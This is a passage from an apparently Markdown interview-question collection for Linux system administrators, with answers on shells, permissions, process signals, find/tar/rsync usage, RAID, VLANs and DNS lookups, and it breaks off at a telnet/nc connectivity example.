principals of open software. **GNU/Linux** is a mesh of those tools and the **Linux kernel** to form a complete OS, but there are other GNUs, e.g. **GNU/Hurd**. **Unix** and **BSD** are "older" implementations of POSIX that are various levels of "closed source". **Unix** is usually totally closed source, but there are as many flavors of **Unix** as there are **Linux** (if not more). **BSD** is not usually considered "open", but it was considered to be very open when it was released. Its licensing also allowed for commercial use with far fewer restrictions than the more "open" licenses of the time allowed. **Linux** is the newest of the four. Strictly speaking, it's "just a kernel"; however, in general, it's thought of as a full OS when combined with GNU Tools and several other core components. The main governing differences between these are their ideals. **Unix**, **Linux**, and **BSD** have different ideals that they implement. They are all POSIX, and are all basically interchangeable. They do solve some of the same problems in different ways. So other then ideals and how they choose to implement POSIX standards, there is little difference. For more info I suggest your read a brief article on the creation of **GNU**, **OSS**, **Linux**, **BSD**, and **UNIX**. They will be slanted towards their individual ideas, but those articles should give you a better idea of the differences. Useful resources: - [What is the difference between Unix, Linux, BSD and GNU? (original)](https://unix.stackexchange.com/questions/104714/what-is-the-difference-between-unix-linux-bsd-and-gnu) - [The Great Debate: Is it Linux or GNU/Linux?](https://www.howtogeek.com/139287/the-great-debate-is-it-linux-or-gnulinux/) </details> <details> <summary><b>What is a CLI? Tell me about your favorite CLI tools, tips, and hacks.</b></summary><br> **CLI** is an acronym for Command Line Interface or Command Language Interpreter. The command line is one of the most powerful ways to control your system/computer. In Unix like systems, **CLI** is the interface by which a user can type commands for the system to execute. The **CLI** is very powerful, but is not very error-tolerant. The **CLI** allows you to do manipulations with your system’s internals and with code in a much more fine-tuned way. It offers greater flexibility and control than a GUI regardless of what OS is used. Many programs that you might want to use in your software that are hosted on say Github also require running some commands on the **CLI** in order to get them running. **My favorite tools** - `screen` - free terminal multiplexer, I can start a session and My terminals will be saved even when you connection is lost, so you can resume later or from home - `ssh` - the most valuable over-all command to learn, I can use it to do some amazing things: * mount a file system over the internet with `sshfs` * forward commands: runs against a `rsync` server with no `rsync` deamon by starting one itself via ssh * run in batch files: I can redirect the output from the remote command and use it within local batch file - `vi/vim` - is the most popular and powerful text editor, it's universal, it's work very fast, even on large files - `bash-completion` - contains a number of predefined completion rules for shell **Tips & Hacks** - searches the command history with `CTRL + R` - `popd/pushd` and other shell builtins which allow you manipulate the directory stack - editing keyboard shortcuts like a `CTRL + U`, `CTRL + E` - combinations will be auto-expanded: * `!*` - all arguments of last command * `!!` - the whole of last command * `!ssh` - last command starting with ssh Useful resources: - [Command Line Interface Definition](http://www.linfo.org/command_line_interface.html) - [What is your single most favorite command-line trick using Bash?](https://stackoverflow.com/questions/68372/what-is-your-single-most-favorite-command-line-trick-using-bash/69716) - [What are your favorite command line features or tricks?](https://unix.stackexchange.com/questions/6/what-are-your-favorite-command-line-features-or-tricks) </details> <details> <summary><b>What is your favorite shell and why?</b></summary><br> **BASH** is my favorite. It’s really a preferential kind of thing, where I love the syntax and it just "clicks" for me. The input/output redirection syntax (`>>`, `<< 2>&1`, `2>`, `1>`, etc) is similar to C++ which makes it easier for me to recognize. I also like the **ZSH** shell, because is much more customizable than **BASH**. It has the Oh-My-Zsh framework, powerful context based tab completion, pattern matching/globbing on steroids, loadable modules and more. Useful resources: - [Comparison of command shells](https://en.wikipedia.org/wiki/Comparison_of_command_shells) </details> <details> <summary><b>How do you get help on the command line? ***</b></summary><br> - `man` [commandname] can be used to see a description of a command (ex.: `man less`, `man cat`) - `-h` or `--help` some programs will implement printing instructions when passed this parameter (ex.: `python -h` and `python --help`) </details> <details> <summary><b>Your first 5 commands on a *nix server after login.</b></summary><br> - `w` - a lot of great information in there with the server uptime - `top` - you can see all running processes, then order them by CPU, memory utilization and more - `netstat` - to know on what port and IP your server is listening on and what processes are using those - `df` - reports the amount of available disk space being used by file systems - `history` - tell you what was previously run by the user you are currently connected to Useful resources: - [First 5 Commands When I Connect on a Linux Server (original)](https://www.linux.com/blog/first-5-commands-when-i-connect-linux-server) </details> <details> <summary><b>What do the fields in <code>ls -al</code> output mean?</b></summary><br> In the order of output: ```bash -rwxrw-r-- 1 root root 2048 Jan 13 07:11 db.dump ``` - file permissions, - number of links, - owner name, - owner group, - file size, - time of last modification, - file/directory name File permissions is displayed as following: - first character is `-` or `l` or `d`, `d` indicates a directory, a `-` represents a file, `l` is a symlink (or soft link) - special type of file - three sets of characters, three times, indicating permissions for owner, group and other: - `r` = readable - `w` = writable - `x` = executable In your example `-rwxrw-r--`, this means the line displayed is: - a regular file (displayed as `-`) - readable, writable and executable by owner (`rwx`) - readable, writable, but not executable by group (`rw-`) - readable but not writable or executable by other (`r--`) Useful resources: - [What do the fields in ls -al output mean? (original)](https://unix.stackexchange.com/questions/103114/what-do-the-fields-in-ls-al-output-mean) </details> <details> <summary><b>How do you get a list of logged-in users?</b></summary><br> For a summary of logged-in users, including each login of a username, the terminal users are attached to, the date/time they logged in, and possibly the computer from which they are making the connection, enter: ```bash # It uses /var/run/utmp and /var/log/wtmp files to get the details. who ``` For extensive information, including username, terminal, IP number of the source computer, the time the login began, any idle time, process CPU cycles, job CPU cycles, and the currently running command, enter: ```bash # It uses /var/run/utmp, and their processes /proc. w ``` Also important for displays a list of last logged in users, enter: ```bash # It uses /var/log/wtmp. last ``` Useful resources: - [4 Ways to Identify Who is Logged-In on Your Linux System](https://www.thegeekstuff.com/2009/03/4-ways-to-identify-who-is-logged-in-on-your-linux-system/) </details> <details> <summary><b>What is the advantage of executing the running processes in the background? How can you do that?</b></summary><br> The most significant advantage of executing the running process in the background is that you can do any other task simultaneously while other processes are running in the background. So, more processes can be completed in the background while you are working on different processes. It can be achieved by adding a special character `&` at the end of the command. Generally applications that take too long to execute and doesn't require user interaction are sent to background so that we can continue our work in terminal. For example if you want to download something in background, you can: ```bash wget https://url-to-download.com/download.tar.gz & ``` When you run the above command you get the following output: ```bash [1] 2203 ``` Here 1 is the serial number of job and 2203 is PID of the job. You can see the jobs running in background using the following command: ```bash jobs ``` When you execute job in background it give you a PID of job, you can kill the job running in background using the following command: ```bash kill PID ``` Replace the PID with the PID of the job. If you have only one job running you can bring it to foreground using: ```bash fg ``` If you have multiple jobs running in background you can bring any job in foreground using: ```bash fg %# ``` Replace the `#` with serial number of the job. Useful resources: - [How do I run a Unix process in the background?](https://kb.iu.edu/d/afnz) - [Job Control Commands](http://tldp.org/LDP/abs/html/x9644.html) - [What is/are the advantage(s) of running applications in background?](https://unix.stackexchange.com/questions/162186/what-is-are-the-advantages-of-running-applications-in-backgound) </details> <details> <summary><b>Before you can manage processes, you must be able to identify them. Which tools will you use? ***</b></summary><br> To be completed. </details> <details> <summary><b>Running the command as root user. It is a good or bad practices?</b></summary><br> Running (everything) as root is bad because: - **Stupidity**: nothing prevents you from making a careless mistake. If you try to change the system in any potentially harmful way, you need to use sudo, which ensures a pause (while you're entering the password) to ensure that you aren't about to make a mistake. - **Security**: harder to hack if you don't know the admin user's login account. root means you already have one half of the working set of admin credentials. - **You don't really need it**: if you need to run several commands as root, and you're annoyed by having to enter your password several times when `sudo` has expired, all you need to do is `sudo -i` and you are now root. Want to run some commands using pipes? Then use `sudo sh -c "command1 | command2"`. - **You can always use it in the recovery console**: the recovery console allows you to recover from a major mistake, or fix a problem caused by an app (which you still had to run as `sudo`). Ubuntu doesn't have a password for the root account in this case, but you can search online for changing that - this will make it harder for anyone that has physical access to your box to be able to do harm. Useful resources: - [Why is it bad to log in as root? (original)](https://askubuntu.com/questions/16178/why-is-it-bad-to-log-in-as-root) - [What's wrong with always being root?](https://serverfault.com/questions/57962/whats-wrong-with-always-being-root) - [Why you should avoid running applications as root](https://bencane.com/2012/02/20/why-you-should-avoid-running-applications-as-root/) </details> <details> <summary><b>How to check memory stats and CPU stats?</b></summary><br> You'd use `top/htop` for both. Using `free` and `vmstat` command we can display the physical and virtual memory statistics respectively. With the help of `sar` command we see the CPU utilization & other stats (but `sar` isn't even installed in most systems). Useful resources: - [How do I Find Out Linux CPU Utilization?](https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html) - [16 Linux server monitoring commands you really need to know](https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html) </details> <details> <summary><b>What is load average?</b></summary><br> Linux **load averages** are "system load averages" that show the running thread (task) demand on the system as an average number of running plus waiting threads. This measures demand, which can be greater than what the system is currently processing. Most tools show three averages, for 1, 5, and 15 minutes. These 3 numbers are not the numbers for the different CPUs. These numbers are mean values of the load number for a given period of time (of the last 1, 5 and 15 minutes). **Load average** is usually described as "average length of run queue". So few CPU-consuming processes or threads can raise **load average** above 1. There is no problem if **load average** is less than total number of CPU cores. But if it gets higher than number of CPUs, this means some threads/processes will stay in queue, ready to run, but waiting for free CPU. It is meant to give you an idea of the state of the system, averaged over several periods of time. Since it is averaged, it takes time for it to go back to 0 after a heavy load was placed on the system. Some interpretations: - if the averages are 0.0, then your system is idle - if the 1 minute average is higher than the 5 or 15 minute averages, then load is increasing - if the 1 minute average is lower than the 5 or 15 minute averages, then load is decreasing - if they are higher than your CPU count, then you might have a performance problem (it depends) Useful resources: - [Linux Load Averages: Solving the Mystery (original)](http://www.brendangregg.com/blog/2017-08-08/linux-load-averages.html) - [Linux load average - the definitive summary](http://blog.angulosolido.pt/2015/04/linux-load-average-definitive-summary.html) - [How CPU load averages work (and using them to triage webserver performance!)](https://jvns.ca/blog/2016/02/07/cpu-load-averages/) </details> <details> <summary><b>Where is my password stored on Linux/Unix?</b></summary><br> The passwords are not stored anywhere on the system at all. What is stored in `/etc/shadow` are so called hashes of the passwords. A hash of some text is created by performing a so called one way function on the text (password), thus creating a string to check against. By design it is "impossible" (computationally infeasible) to reverse that process. Older Unix variants stored the encrypted passwords in `/etc/passwd` along with other information about each account. Newer ones simply have a `*` in the relevant field in `/etc/passwd` and use `/etc/shadow` to store the password, in part to ensure nobody gets read access to the passwords when they only need the other stuff (`shadow` is usually protected more strongly than `passwd`). For more info consult `man crypt`, `man shadow`, `man passwd`. Useful resources: - [Where is my password stored on Linux?](https://security.stackexchange.com/questions/37050/where-is-my-password-stored-on-linux) - [Where are the passwords of the users located in Linux?](https://www.cyberciti.biz/faq/where-are-the-passwords-of-the-users-located-in-linux/) - [Linux Password & Shadow File Formats](https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html) </details> <details> <summary><b>How to recursively change permissions for all directories except files and for all files except directories?</b></summary><br> To change all the directories e.g. to **755** (`drwxr-xr-x`): ```bash find /opt/data -type d -exec chmod 755 {} \; ``` To change all the files e.g. to **644** (`-rw-r--r--`): ```bash find /opt/data -type f -exec chmod 644 {} \; ``` Useful resources: - [How do I set chmod for a folder and all of its subfolders and files? (original)](https://stackoverflow.com/questions/3740152/how-do-i-set-chmod-for-a-folder-and-all-of-its-subfolders-and-files?rq=1) </details> <details> <summary><b>Every command fails with <code>command not found</code>. How to trace the source of the error and resolve it?</b></summary><br> It looks that at one point or another are overwriting the default `PATH` environment variable. The type of errors you have, indicates that `PATH` does not contain e.g. `/bin`, where the commands (including bash) reside. One way to begin debugging your bash script or command would be to start a subshell with the `-x` option: ```bash bash --login -x ``` This will show you every command, and its arguments, which is executed when starting that shell. Also very helpful is show `PATH` variable values: ```bash echo $PATH ``` If you run this: ```bash PATH=/bin:/sbin:/usr/bin:/usr/sbin ``` most commands should start working - and then you can edit `~/.bash_profile` instead of `~/.bashrc` and fix whatever is resetting `PATH` there. Default `PATH` variable values for **root** and other users is in `/etc/profile` file. Useful resource: - [How to correctly add a path to PATH?](https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path) </details> <details> <summary><b>You typing <code>CTRL + C</code> but your script still running. How do you stop it? ***</b></summary><br> To be completed. Useful resources: - [How to kill a script running in terminal, without closing terminal (Ctrl + C doesn't work)? (original)](https://askubuntu.com/questions/520107/how-to-kill-a-script-running-in-terminal-without-closing-terminal-ctrl-c-doe) - [What's the difference between ^C and ^D for Unix/Mac OS X terminal?](https://superuser.com/questions/169051/whats-the-difference-between-c-and-d-for-unix-mac-os-x-terminal) </details> <details> <summary><b>What is <code>grep</code> command? How to match multiple strings in the same line?</b></summary><br> The `grep` utilities are a family of Unix tools, including `egrep` and `fgrep`. `grep` searches file patterns. If you are looking for a specific pattern in the output of another command, `grep` highlights the relevant lines. Use this grep command for searching log files, specific processes, and more. For match multiple strings: ```bash grep -E "string1|string2" filename ``` or ```bash grep -e "string1" -e "string2" filename ``` Useful resources: - [What is grep, and how do I use it? (original)](https://kb.iu.edu/d/afiy) </details> <details> <summary><b>Explain the file content commands along with the description.</b></summary><br> - `head`: to check the starting of a file. - `tail`: to check the ending of the file. It is the reverse of head command. - `cat`: used to view, create, concatenate the files. - `more`: used to display the text in the terminal window in pager form. - `less`: used to view the text in the backward direction and also provides single line movement. Useful resources: - [Viewing text files from the shell prompt](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Step_by_Step_Guide/s1-viewingtext-terminal.html) </details> <details> <summary><b>SIGHUP, SIGINT, SIGKILL, and SIGTERM POSIX signals. Explain.</b></summary><br> - **SIGHUP** - is sent to a process when its controlling terminal is closed. It was originally designed to notify the process of a serial line drop (a hangup). Many daemons will reload their configuration files and reopen their logfiles instead of exiting when receiving this signal. - **SIGINT** - is sent to a process by its controlling terminal when a user wishes to interrupt the process. This is typically initiated by pressing `Ctrl+C`, but on some systems, the "delete" character or "break" key can be used. - **SIGKILL** - is sent to a process to cause it to terminate immediately (kill). In contrast to **SIGTERM** and **SIGINT**, this signal cannot be caught or ignored, and the receiving process cannot perform any clean-up upon receiving this signal. - **SIGTERM** - is sent to a process to request its termination. Unlike the **SIGKILL** signal, it can be caught and interpreted or ignored by the process. This allows the process to perform nice termination releasing resources and saving state if appropriate. **SIGINT** is nearly identical to **SIGTERM**. Useful resources: - [POSIX signals](https://dsa.cs.tsinghua.edu.cn/oj/static/unix_signal.html) - [Introduction To Unix Signals Programming](http://titania.ctie.monash.edu.au/signals/) </details> <details> <summary><b>What does <code>kill</code> command do?</b></summary><br> In Unix and Unix-like operating systems, `kill` is a command used to send a signal to a process. By default, the message sent is the termination signal, which requests that the process exit. But `kill` is something of a misnomer; the signal sent may have nothing to do with process killing. Useful resources: - [Mastering the "Kill" Command in Linux](https://www.maketecheasier.com/kill-command-in-linux/) </details> <details> <summary><b>What is the difference between <code>rm</code> and <code>rm -rf</code>?</b></summary><br> `rm` only deletes the named files (and not directories). With `-rf` as you say: - `-r`, `-R`, `--recursive` recursively deletes content of a directory, including hidden files and sub directories - `-f`, `--force` ignore nonexistent files, never prompt Useful resources: - [What is the difference between `rm -r` and `rm -f`?](https://superuser.com/questions/1126206/what-is-the-difference-between-rm-r-and-rm-f) </details> <details> <summary><b>How do I <code>grep</code> recursively? Explain on several examples. ***</b></summary> To be completed. </details> <details> <summary><b><code>archive.tgz</code> has ~30 GB. How do you list content of it and extract only one file?</b></summary><br> ```bash # list of content tar tf archive.tgz # extract file tar xf archive.tgz filename ``` Useful resources: - [List the contents of a tar or tar.gz file](https://www.cyberciti.biz/faq/list-the-contents-of-a-tar-or-targz-file/) - [How to extract specific file(s) from tar.gz](https://unix.stackexchange.com/questions/61461/how-to-extract-specific-files-from-tar-gz) </details> <details> <summary><b>Execute combine multiple shell commands in one line.</b></summary><br> If you want to execute each command only if the previous one succeeded, then combine them using the `&&` operator: ```bash cd /my_folder && rm *.jar && svn co path to repo && mvn compile package install ``` If one of the commands fails, then all other commands following it won't be executed. If you want to execute all commands regardless of whether the previous ones failed or not, separate them with semicolons: ```bash cd /my_folder; rm *.jar; svn co path to repo; mvn compile package install ``` In your case, I think you want the first case where execution of the next command depends on the success of the previous one. You can also put all commands in a script and execute that instead: ```bash #! /bin/sh cd /my_folder \ && rm *.jar \ && svn co path to repo \ && mvn compile package install ``` Useful resources: - [Execute combine multiple linux commands in one line (original)](https://stackoverflow.com/questions/13077241/execute-combine-multiple-linux-commands-in-one-line) </details> <details> <summary><b>What symbolic representation can you pass to <code>chmod</code> to give all users execute access to a file without affecting other permissions?</b></summary><br> ```bash chmod a+x /path/to/file ``` - `a` - for all users - `x` - for execution permission - `r` - for read permission - `w` - for write permission Useful resources: - [How to Set File Permissions Using chmod](https://www.washington.edu/computing/unix/permissions.html) - [What does "chmod +x your_file_name" do and how do I use it?](https://askubuntu.com/questions/443789/what-does-chmod-x-filename-do-and-how-do-i-use-it) </details> <details> <summary><b>How can I sync two local directories?</b></summary><br> To sync the contents of **dir1** to **dir2** on the same system, type: ```bash rsync -av --progress --delete dir1/ dir2 ``` - `-a`, `--archive` - archive mode - `--delete` - delete extraneous files from dest dirs - `-v`, `--verbose` - verbose mode (increase verbosity) - `--progress` - show progress during transfer Useful resources: - [How can I sync two local directories? (original](https://unix.stackexchange.com/questions/392536/how-can-i-sync-two-local-directories) - [Synchronizing folders with rsync](https://www.jveweb.net/en/archives/2010/11/synchronizing-folders-with-rsync.html) </details> <details> <summary><b>Many basic maintenance tasks require you to edit config files. Explain ways to undo the changes you make.</b></summary><br> - manually backup of a file before editing (with brace expansion like this: `cp filename{,.orig}`) - manual copy of the directory structure where file is stored (e.g. `cp`, `rsync` or `tar`) - make a backup of original file in your editor (e.g. set rules in your editor configuration file) - the best solution is to use `git` (or any other version control) to keep track of configuration files (e.g. `etckeeper` for `/etc` directory) Useful resources: - [Backup file with .bak before filename extension](https://unix.stackexchange.com/questions/66376/backup-file-with-bak-before-filename-extension) - [Is it a good idea to use git for configuration file version controlling?](https://superuser.com/questions/1037211/is-it-a-good-idea-to-use-git-for-configuration-file-version-controlling) </details> <details> <summary><b>You have to find all files larger than 20MB. How you do it?</b></summary><br> ```bash find / -type f -size +20M ``` Useful resources: - [How can I find files that are bigger/smaller than x bytes?](https://superuser.com/questions/204564/how-can-i-find-files-that-are-bigger-smaller-than-x-bytes) </details> <details> <summary><b>Why do we use <code>sudo su -</code> and not just <code>sudo su</code>?</b></summary><br> `sudo` is in most modern Linux distributions where (but not always) the root user is disabled and has no password set. Therefore you cannot switch to the root user with `su` (you can try). You have to call `sudo` with root privileges: `sudo su`. `su` just switches the user, providing a normal shell with an environment nearly the same as with the old user. `su -` invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base. Useful resources: - [su vs sudo -s vs sudo -i vs sudo bash](https://unix.stackexchange.com/questions/35338/su-vs-sudo-s-vs-sudo-i-vs-sudo-bash) - [Why do we use su - and not just su? (original)](https://unix.stackexchange.com/questions/7013/why-do-we-use-su-and-not-just-su) </details> <details> <summary><b>How to find files that have been modified on your system in the past 60 minutes?</b></summary><br> ```bash find / -mmin -60 -type f ``` Useful resources: - [Get all files modified in last 30 days in a directory (orignal)](https://stackoverflow.com/questions/23070245/get-all-files-modified-in-last-30-days-in-a-directory) </details> <details> <summary><b>What are the main reasons for keeping old log files?</b></summary><br> They are essential to investigate issues on the system. **Log management** is absolutely critical for IT security. Servers, firewalls, and other IT equipment keep log files that record important events and transactions. This information can provide important clues about hostile activity affecting your network from within and without. Log data can also provide information for identifying and troubleshooting equipment problems including configuration problems and hardware failure. It’s your server’s record of who’s come to your site, when, and exactly what they looked at. It’s incredibly detailed, showing: - where folks came from - what browser they were using - exactly which files they looked at - how long it took to load each file - and a whole bunch of other nerdy stuff Factors to consider: - legal requirements for retention or destruction - company policies for retention and destruction - how long the logs are useful - what questions you're hoping to answer from the logs - how much space they take up By collecting and analyzing logs, you can understand what transpires within your network. Each log file contains many pieces of information that can be invaluable, especially if you know how to read them and analyze them. Useful resources: - [How long do you keep log files?](https://serverfault.com/questions/135365/how-long-do-you-keep-log-files) </details> <details> <summary><b>What is an incremental backup?</b></summary><br> An incremental backup is a type of backup that only copies files that have changed since the previous backup. Useful resources: - [What Is Incremental Backup?](https://www.nakivo.com/blog/what-is-incremental-backup/) </details> <details> <summary><b>What is RAID? What is RAID0, RAID1, RAID5, RAID6, RAID10? </b></summary><br> A **RAID** (Redundant Array of Inexpensive Disks) is a technology that is used to increase the performance and/or reliability of data storage. - **RAID0**: Also known as disk **striping**, is a technique that breaks up a file and spreads the data across all the disk drives in a RAID group. There are no safeguards against failure - **RAID1**: A popular disk subsystem that increases safety by writing the same data on two drives. Called "**mirroring**," RAID 1 does not increase write performance, but read performance may equal up to the sum of each disks' performance. However, if one drive fails, the second drive is used, and the failed drive is manually replaced. After replacement, the RAID controller duplicates the contents of the working drive onto the new one - **RAID5**: It is disk subsystem that increases safety by computing parity data and increasing speed by interleaving data across three or more drives (**striping**). Upon failure of a single drive, subsequent reads can be calculated from the distributed parity such that no data is lost - **RAID6**: RAID 6 extends RAID 5 by adding another parity block. It requires a minimum of four disks and can continue to execute read and write of any two concurrent disk failures. RAID 6 does not have a performance penalty for read operations, but it does have a performance penalty on write operations because of the overhead associated with parity calculations - **RAID10**: Also known as **RAID 1+0**, is a RAID configuration that combines disk mirroring and disk striping to protect data. It requires a minimum of four disks, and stripes data across mirrored pairs. As long as one disk in each mirrored pair is functional, data can be retrieved. If two disks in the same mirrored pair fail, all data will be lost because there is no parity in the striped sets Useful resources: - [RAID](https://www.prepressure.com/library/technology/raid) </details> <details> <summary><b>How is a user’s default group determined? How would you change it? </b></summary><br> ```bash useradd -m -g initial_group username ``` `-g/--gid`: defines the group name or number of the user's initial login group. If specified, the group name must exist; if a group number is provided, it must refer to an already existing group. If not specified, the behaviour of useradd will depend on the `USERGROUPS_ENAB` variable contained in `/etc/login.defs`. The default behaviour (`USERGROUPS_ENAB yes`) is to create a group with the same name as the username, with **GID** equal to **UID**. Useful resources: - [How can I change a user's default group in Linux?](https://unix.stackexchange.com/questions/26675/how-can-i-change-a-users-default-group-in-linux) </details> <details> <summary><b>What is your best command line text editor for daily working and scripting? ***</b></summary><br> To be completed. </details> <details> <summary><b>Why would you want to mount servers in a rack?</b></summary><br> - Protecting Hardware - Proper Cooling - Organized Workspace - Better Power Management - Cleaner Environment Useful resources: - [5 Reasons to Rackmount Your PC](https://www.racksolutions.com/news/custom-projects/5-reasons-to-rackmount-pc/) </details> ###### Network Questions (23) <details> <summary><b>Draw me a simple network diagram: you have 20 systems, 1 router, 4 switches, 5 servers, and a small IP block. ***</b></summary><br> To be completed. </details> <details> <summary><b>What are the most important things to understand about the OSI (or any other) model?</b></summary><br> The most important things to understand about the **OSI** (or any other) model are: - we can divide up the protocols into layers - layers provide encapsulation - layers provide abstraction - layers decouple functions from others Useful resources: - [OSI Model and Networking Protocols Relationship](https://networkengineering.stackexchange.com/questions/6380/osi-model-and-networking-protocols-relationship) </details> <details> <summary><b>What is the difference between a VLAN and a subnet? Do you need a VLAN to setup a subnet?</b></summary><br> **VLANs** and **subnets** solve different problems. **VLANs** work at Layer 2, thereby altering broadcast domains (for instance). Whereas **subnets** are Layer 3 in the current context. **Subnet** - is a range of IP addresses determined by part of an address (often called the network address) and a subnet mask (netmask). For example, if the netmask is `255.255.255.0` (or `/24` for short), and the network address is `192.168.10.0`, then that defines a range of IP addresses `192.168.10.0` through `192.168.10.255`. Shorthand for writing that is `192.168.10.0/24`. **VLAN** - a good way to think of this is "switch partitioning." Let's say you have an 8 port switch that is VLAN-able. You can assign 4 ports to one **VLAN** (say `VLAN 1`) and 4 ports to another **VLAN** (say `VLAN 2`). `VLAN 1` won't see any of `VLAN 2's` traffic and vice versa, logically, you now have two separate switches. Normally on a switch, if the switch hasn't seen a MAC address it will "flood" the traffic to all other ports. **VLANs** prevent this. Subnet is nothing more than an IP address range of IP addresses that help hosts communicate over layer 2 and 3. Each subnet does not require its own **VLAN**. **VLANs** are implemented for isolation (are sandbox for layer two communication, no 2 systems of 2 different **VLANs** may communicate but it can be done through **Inter VLAN routing**), ease of management and security. Useful resources: - [What is the difference between a VLAN and a subnet? (original)](https://superuser.com/questions/353664/what-is-the-difference-between-a-vlan-and-a-subnet) - [VLANS vs. subnets for network security and segmentation](https://networkengineering.stackexchange.com/questions/46899/vlans-vs-subnets-for-network-security-and-segmentation) </details> <details> <summary><b>List 5 common network ports you should know.</b></summary><br> <table style="width:100%"> <tr> <th>SERVICE</th> <th>PORT</th> </tr> <tr> <td>SMTP</td> <td>25</td> </tr> <tr> <td>FTP</td> <td>20 for data transfer and 21 for connection established</td> </tr> <tr> <td>DNS</td> <td>53</td> </tr> <tr> <td>DHCP</td> <td>67/UDP for DHCP server, 68/UDP for DHCP client</td> </tr> <tr> <td>SSH</td> <td>22</td> </tr> </table> Useful resources: - [Red Hat Enterprise Linux 4: Security Guide - Common Ports](https://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-sg-en-4/ch-ports.html) </details> <details> <summary><b>What POP and IMAP are, and how to choose which of them you should implement?</b></summary><br> POP and IMAP are both protocols for retrieving messages from a mail server to a mail client. **POP** (_Post Office Protocol_) uses a one way push from mail server to client. By default this will send messages to the POP mail client and remove them from the mail server, though it is possible to configure the mail server to retain all messages. Any actions you take on the message in your mail client (labeling, deleting, moving to a folder) will not be reflected on the mail server, and thus inaccessible to other mail clients pulling from the mail server. POP uses little storage space on the mail server and can be seen as more secure since messages only exist on one mail client instead of the mail server and multiple clients. **IMAP** (_Internet Message Access Protocol_) uses two way communication between mail server and client. Deleting or labeling a message in your mail client configured with IMAP will also delete or label the message on the mail server. IMAP allows for a similar experience when accessing mail across different clients or devices since messages can existing in the same state across multiple devices. IMAP can also save disk space on the mail client by selectively syncing messages, deleting older messages from the mail client since it can sync them from the mail server later as needed. Choose IMAP if you need to access messages across multiple devices and you want to save disk space on your client device. Choose POP if you want to save disk space on your mail server, only access messages from one client device, and ensure that messages do not exist on multiple systems. </details> <details> <summary><b>How to check default route and routing table?</b></summary><br> Using the commands `netstat -nr`, `route -n` or `ip route show` we can see the default route and routing tables. Useful resources: - [How to check routes (routing table) in linux](https://howto.lintel.in/how-to-check-routes-routing-table-in-linux/) - [FreeBSD Set a Default Route/Gateway](https://www.cyberciti.biz/faq/freebsd-setup-default-routing-with-route-command/) </details> <details> <summary><b>What is the difference between 127.0.0.1 and localhost?</b></summary><br> Well, the most likely difference is that you still have to do an actual lookup of localhost somewhere. If you use `127.0.0.1`, then (intelligent) software will just turn that directly into an IP address and use it. Some implementations of `gethostbyname` will detect the dotted format (and presumably the equivalent IPv6 format) and not do a lookup at all. Otherwise, the name has to be resolved. And there's no guarantee that your hosts file will actually be used for that resolution (first, or at all) so `localhost` may become a totally different IP address. By that I mean that, on some systems, a local hosts file can be bypassed. The `host.conf` file controls this on Linux (and many other Unices). If you use a Unix domain socket it'll be slightly faster than using TCP/IP (because of the less overhead you have). Windows is using TCP/IP as a default, whereas Linux tries to use a Unix Domain Socket if you choose localhost and TCP/IP if you take `127.0.0.1`. Useful resources: - [What is the difference between 127.0.0.1 and localhost?](https://stackoverflow.com/questions/7382602/what-is-the-difference-between-127-0-0-1-and-localhost) - [localhost vs. 127.0.0.1](https://stackoverflow.com/questions/3715925/localhost-vs-127-0-0-1) </details> <details> <summary><b>Which port is used for <code>ping</code> command?</b></summary><br> `ping` uses **ICMP**, specifically **ICMP echo request** and **ICMP echo reply** packets. There is no 'port' associated with **ICMP**. Ports are associated with the two IP transport layer protocols, TCP and UDP. **ICMP**, TCP, and UDP are "siblings"; they are not based on each other, but are three separate protocols that run on top of IP. **ICMP** packets are identified by the 'protocol' field in the IP datagram header. **ICMP** does not use either UDP or TCP communications services, it uses raw IP communications services. This means that the **ICMP** message is carried directly in an IP datagram data field. `raw` comes from how this is implemented in software, to create and send an **ICMP** message, one opens a `raw` socket, builds a buffer containing the **ICMP** message, and then writes the buffer containing the message to the raw socket. The IP protocol value for **ICMP** is 1. The protocol field is part of the IP header and identifies what is in the data portion of the IP datagram. However, you could use `nmap` to see whether ports are open or not: ```bash nmap -p 80 example.com ``` Useful resources: - [Ping Port Number](https://networkengineering.stackexchange.com/questions/42463/ping-port-number) - [Is it possible to ping an address:port?](https://superuser.com/questions/769541/is-it-possible-to-ping-an-addressport) </details> <details> <summary><b>Server A can't talk to Server B. Describe possible reasons in a few steps.</b></summary><br> To troubleshoot communication problems between servers, it is better to ideally follow the TCP/IP stack: 1. **Application Layer**: are the services up and running on both servers? Are they correctly configured (eg. bind the correct IP and correct port)? Do application and system logs show meaningful errors? 2. **Transport Layer**: are the ports used by the application open (try telnet!)? Is it possible to ping the server? 3. **Network Layer**: is there a firewall on the network or on the OS correctly configured? Is the IP stack correctly configured (IP, routes, dns, etc.)? Are switches and routers working (check the ARP table!)? 4. **Physical Layer**: are the servers connected to a network? Are packets being lost? </details> <details> <summary><b>Why won’t the hostnames resolve on your server? Fix this issue. ***</b></summary><br> To be completed. </details> <details> <summary><b>How to resolve the domain name (using external dns) with CLI? Can IPs be resolved to domain names?</b></summary><br> Examples for resolve IP address to domain name: ```bash # with host command: host domain.com 8.8.8.8 # with dig command: dig @9.9.9.9 google.com # with nslookup command: nslookup domain.com 8.8.8.8 ``` You can (sometimes) resolve an IP Address back to a hostname. IP Address can be stored against a **PTR** record. You can then do: ```bash dig A <hostname> ``` To lookup the IPv4 address for a host, or: ```bash dig AAAA <hostname> ``` To lookup the IPv6 address for a host, or: ```bash dig PTR ZZZ.YYY.XXX.WWW.in-addr.arpa. ``` To lookup the hostname for IPv4 address `WWW.XXX.YYY.ZZZ` (note the octets are reversed), or: ```bash dig PTR b.a.9.8.7.6.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa. ``` Useful resources: - [How can I resolve a hostname to an IP address in a Bash script?](https://unix.stackexchange.com/questions/20784/how-can-i-resolve-a-hostname-to-an-ip-address-in-a-bash-script) - [How To Resolve IP Addresses To Domain Names?](https://superuser.com/questions/315687/how-to-resolve-ip-addresses-to-domain-names) </details> <details> <summary><b>How to test port connectivity with <code>telnet</code> or <code>nc</code>?</b></summary><br> ```bash # with telnet command: 